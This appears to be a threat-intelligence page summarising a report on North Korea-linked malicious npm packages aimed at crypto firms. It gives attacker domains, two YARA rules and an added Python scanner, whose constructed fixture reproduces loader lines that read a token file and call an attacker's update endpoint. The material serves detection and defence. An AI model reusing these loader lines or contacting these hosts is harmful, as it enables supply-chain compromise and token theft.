lazarusholic

Everyday is lazarus.dayβ

Lazarus Group Launches First Open Source Supply Chain Attacks Targeting Crypto Sector

2023-08-02, Checkmarx
https://medium.com/checkmarx-security/lazarus-group-launches-first-open-source-supply-chain-attacks-targeting-crypto-sector-cabc626e404e
#NPM #JadeSleet

Contents

Over the last month we have been monitoring a highly targeted campaign. We began tracking this threat actor in early April 2023, when our systems flagged several suspicious npm packages (the same packages were also flagged by our colleagues at Phylum). GitHub later confirmed that the actor is Jade Sleet, also tracked as TraderTraitor, a North Korea-affiliated group associated with the infamous Lazarus Group.
This operation primarily preyed on companies in the blockchain and cryptocurrency sectors, using a combination of social engineering and malicious npm package dependencies to infiltrate their software supply chains.
Key points:
- This is the first identified instance of a nation-state actor using open-source packages to infiltrate software supply chains.
- The attack used social engineering as its entry point: fake developer personas with fabricated reputations persuaded victims to install malicious open-source packages.
- The malicious code was …

IoC

http://bi2price.com
http://coingeckoprice.com
http://cryptopriceoffer.com
http://npmaudit.com
http://npmcloudjs.com
http://npmjscloud.com
http://npmjsregister.com
http://npmrepos.com
http://tradingprice.net
https://cryptopriceoffer.com/checkupdate.php
rule lazarus_1
{
    meta:
        description = "Detects code used by the North Korea-backed group known as Lazarus to target its victims"
    strings:
        $pattern1 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'http:\/\/[\w\.]+\/checkupdate\.php'\);/
        $pattern2 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'https:\/\/[\w\.]+\/checkupdate\.php'\);/
        $pattern3 = "process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0"
        $pattern4 = "Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA=="   // base64("NODE_TLS_REJECT_UNAUTHORIZED")
        $pattern5 = "function checksvn(version, projectUrl)"
    condition:
        ($pattern1 or $pattern2) and ($pattern3 or $pattern4) and $pattern5
}
rule lazarus_2
{
    meta:
        description = "Detects code used by the North Korea-backed group known as Lazarus to target its victims"
    strings:
        $pattern1 = /getsvnroot\('[\w\.]+', '\/getupdate\.php', token, path\.join\(dir ,'check\w+\.js'\)\);/
        $pattern2 = "function getsvnroot(domain, entry, token, path)"
        $pattern3 = "const token = fs.readFileSync(path.join(dir,'jsontoken'))"
    condition:
        all of them
}
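The following is an added example, not code from the Checkmarx post: a pure-Python triage scanner that mirrors the string and condition logic of the two YARA rules above with the standard re module and checks every http(s) URL found in a file against the IoC domain list, so it can be run where yara-python is not installed. The YARA patterns are copied verbatim from the rules; the two npm "package" sources it scans are constructed for the demo and are not real artifacts from the campaign.

```python
import re
from urllib.parse import urlparse

# Hostnames from the IoC list above.
IOC_DOMAINS = {
    "bi2price.com", "coingeckoprice.com", "cryptopriceoffer.com",
    "npmaudit.com", "npmcloudjs.com", "npmjscloud.com",
    "npmjsregister.com", "npmrepos.com", "tradingprice.net",
}

# The YARA strings as Python regexes. Plain YARA strings become escaped
# literals; the YARA regex strings are copied as-is, since YARA and Python
# share this regex syntax.
LAZARUS_1 = {
    "p1": re.compile(r"checksvn\(path\.join\(dir,'\/\w+token'\), 'http:\/\/[\w\.]+\/checkupdate\.php'\);"),
    "p2": re.compile(r"checksvn\(path\.join\(dir,'\/\w+token'\), 'https:\/\/[\w\.]+\/checkupdate\.php'\);"),
    "p3": re.compile(re.escape("process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0")),
    "p4": re.compile(re.escape("Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA==")),  # base64("NODE_TLS_REJECT_UNAUTHORIZED")
    "p5": re.compile(re.escape("function checksvn(version, projectUrl)")),
}
LAZARUS_2 = {
    "p1": re.compile(r"getsvnroot\('[\w\.]+', '\/getupdate\.php', token, path\.join\(dir ,'check\w+\.js'\)\);"),
    "p2": re.compile(re.escape("function getsvnroot(domain, entry, token, path)")),
    "p3": re.compile(re.escape("const token = fs.readFileSync(path.join(dir,'jsontoken'))")),
}


def rule_lazarus_1(src: str) -> bool:
    """YARA condition: ($pattern1 or $pattern2) and ($pattern3 or $pattern4) and $pattern5"""
    m = {k: p.search(src) is not None for k, p in LAZARUS_1.items()}
    return (m["p1"] or m["p2"]) and (m["p3"] or m["p4"]) and m["p5"]


def rule_lazarus_2(src: str) -> bool:
    """YARA condition: all of them"""
    return all(p.search(src) is not None for p in LAZARUS_2.values())


URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[^\s'\"]*)?")


def ioc_domains(src: str) -> list:
    """Hosts of any http(s) URL in src that are on the IoC list. Exact host match,
    so the legitimate api.coingecko.com does not collide with coingeckoprice.com."""
    hits = set()
    for url in URL_RE.findall(src):
        host = urlparse(url).hostname
        if host and host.lower() in IOC_DOMAINS:
            hits.add(host.lower())
    return sorted(hits)


def triage(src: str) -> dict:
    return {
        "lazarus_1": rule_lazarus_1(src),
        "lazarus_2": rule_lazarus_2(src),
        "ioc_domains": ioc_domains(src),
    }


# Constructed sample of a trojanised package entry point, assembled from the
# strings the rules look for; not a real file from the campaign.
MALICIOUS_SAMPLE = """
const fs = require('fs');
const path = require('path');
const dir = __dirname;
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
function checksvn(version, projectUrl) { /* fetch second stage */ }
function getsvnroot(domain, entry, token, path) { /* write stage to disk */ }
const token = fs.readFileSync(path.join(dir,'jsontoken'));
checksvn(path.join(dir,'/jsontoken'), 'https://cryptopriceoffer.com/checkupdate.php');
getsvnroot('cryptopriceoffer.com', '/getupdate.php', token, path.join(dir ,'checkupdate.js'));
"""

# Constructed benign sample: disabling TLS verification is bad practice but on
# its own does not satisfy lazarus_1, and coingecko.com is not an IoC.
BENIGN_SAMPLE = """
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
fetch('https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd');
"""

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, triage(src))
```

Two caveats for anyone deploying this. First, the rules key on exact spacing and quoting (`dir,'/` versus `dir, '/`), so a trivially reformatted or minified variant of the same loader will not fire; treat a hit as a strong signal and a miss as no information. Second, the scanner only reads source text; the real tool for the rules above is YARA itself (for example `yara -r rules.yar node_modules/`), which also handles compiled or binary artifacts.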